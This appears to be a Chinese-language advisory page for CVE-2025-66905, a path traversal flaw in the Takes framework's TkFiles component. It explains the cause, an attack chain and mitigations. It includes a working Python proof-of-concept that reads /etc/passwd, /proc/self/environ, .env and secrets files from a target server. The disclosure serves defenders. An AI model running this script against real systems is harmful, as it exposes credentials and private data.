CVE-2025-66905 Takes框架TkFiles目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-66905

漏洞类型

目录遍历/路径穿越

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Takes web framework (TkFiles)

漏洞概述

CVE-2025-66905是Takes Web框架中TkFiles组件的一个高危安全漏洞。该漏洞源于TkFiles在处理HTTP请求路径时，未能对路径进行规范化（canonicalization）处理就直接与文件系统进行交互。攻击者可以通过在请求路径中插入"../"序列，突破配置的基准目录限制，遍历到服务器上的任意目录并读取敏感文件。此漏洞无需任何认证即可被利用，影响版本包括Takes框架2.0-SNAPSHOT及之前版本。由于CVSS评分达到7.5（高危），且攻击复杂度低、无需认证，远程攻击者可以轻松利用此漏洞获取服务器上的配置文件、密钥、密码文件等敏感信息，对系统安全造成严重威胁。建议受影响的用户尽快升级到最新版本或采取临时缓解措施。

技术细节

Takes框架的TkFiles组件用于处理静态文件服务，其设计理念是将请求路径映射到配置的基准目录下的文件。然而，由于缺少路径规范化步骤，攻击者可以通过构造包含"../"的特殊请求路径来突破目录限制。例如，当基准目录设置为"/var/www/html"时，攻击者发送请求"/files/../../../../etc/passwd"，TkFiles会直接拼接路径而不验证其合法性，最终解析为"/etc/passwd"并返回文件内容。漏洞的核心问题在于：1) 未调用Java的getCanonicalPath()方法进行路径规范化；2) 未验证解析后的绝对路径是否仍在基准目录内；3) 直接使用用户输入的路径进行文件读取操作。攻击者可以利用此漏洞读取服务器上的任意文件，包括但不限于系统配置文件（/etc/passwd、/etc/shadow）、应用程序配置、环境变量文件等敏感信息。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标服务器运行Takes Web框架，并发现其提供文件服务功能（通常路径包含/files、/static等）

STEP 2

2

构造恶意请求：攻击者构建包含路径遍历序列（如../../../）的特殊URL，例如 /files/../../../../etc/passwd

STEP 3

3

发送HTTP请求：攻击者向目标服务器发送构造好的HTTP GET请求

STEP 4

4

路径解析：TkFiles组件接收请求路径后，未进行规范化处理，直接与文件系统路径拼接

STEP 5

5

目录逃逸：由于缺少路径验证，../序列使路径突破基准目录限制，指向服务器任意位置

STEP 6

6

文件读取与泄露：服务器返回目标文件内容（如/etc/passwd、配置文件、密钥等敏感信息）

STEP 7

7

持久化利用：攻击者可能利用获取的敏感信息进一步实施横向移动、权限提升或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66905 Path Traversal PoC for Takes Framework TkFiles
# The vulnerability allows reading arbitrary files by using ../ sequences

import requests
import sys

def exploit_tkfiles(target_url, base_dir="files"):
    """
    Exploit CVE-2025-66905: TkFiles Path Traversal
    
    Args:
        target_url: Base URL of the vulnerable Takes application
        base_dir: The configured base directory (default: 'files')
    
    This PoC demonstrates how to escape the base directory using '../' sequences.
    """
    
    # Files to attempt reading
    sensitive_files = [
        "../../../../etc/passwd",
        "../../../../etc/hosts",
        "../../../../etc/group",
        "../../../../proc/self/environ",
        "../../../../proc/self/cmdline",
        "../../../../../../../../../etc/passwd",
        "../../../../../etc/passwd%00.txt",  # Null byte injection attempt
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-66905 - TkFiles Path Traversal\n")
    
    for file_path in sensitive_files:
        url = f"{target_url}/{base_dir}/{file_path}"
        print(f"[+] Trying: {url}")
        
        try:
            response = requests.get(url, timeout=10)
            
            if response.status_code == 200:
                print(f"[SUCCESS] Retrieved: {file_path}")
                print(f"Content preview:\n{response.text[:500]}...")
                print("-" * 60)
            elif response.status_code == 403:
                print(f"[BLOCKED] Access denied for: {file_path}")
            else:
                print(f"[FAILED] Status code: {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[ERROR] Request failed: {e}")
    
    # Example: Reading application configuration
    print("\n[*] Attempting to read application configs...")
    config_paths = [
        "../../../../app/config/application.conf",
        "../../../../app/secrets.yaml",
        "../../../../.env",
    ]
    
    for config in config_paths:
        url = f"{target_url}/{base_dir}/{config}"
        print(f"[+] Trying config: {config}")
        
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200 and len(response.text) > 0:
                print(f"[SUCCESS] Found config file!")
                print(f"Content:\n{response.text}")
        except:
            pass

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-66905.py <target_url>")
        print("Example: python cve-2025-66905.py http://vulnerable-server.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_tkfiles(target)

影响范围

Takes web framework TkFiles < 2.0-SNAPSHOT

Takes framework 所有包含TkFiles组件的版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web服务器层面配置规则，拦截包含"../"序列的请求；2) 限制Web进程的文件系统访问权限；3) 使用反向代理限制对特定路径的访问；4) 监控日志中的异常文件访问请求；5) 避免将敏感文件放置在Web应用可访问的目录中。同时建议尽快评估并部署官方发布的安全补丁。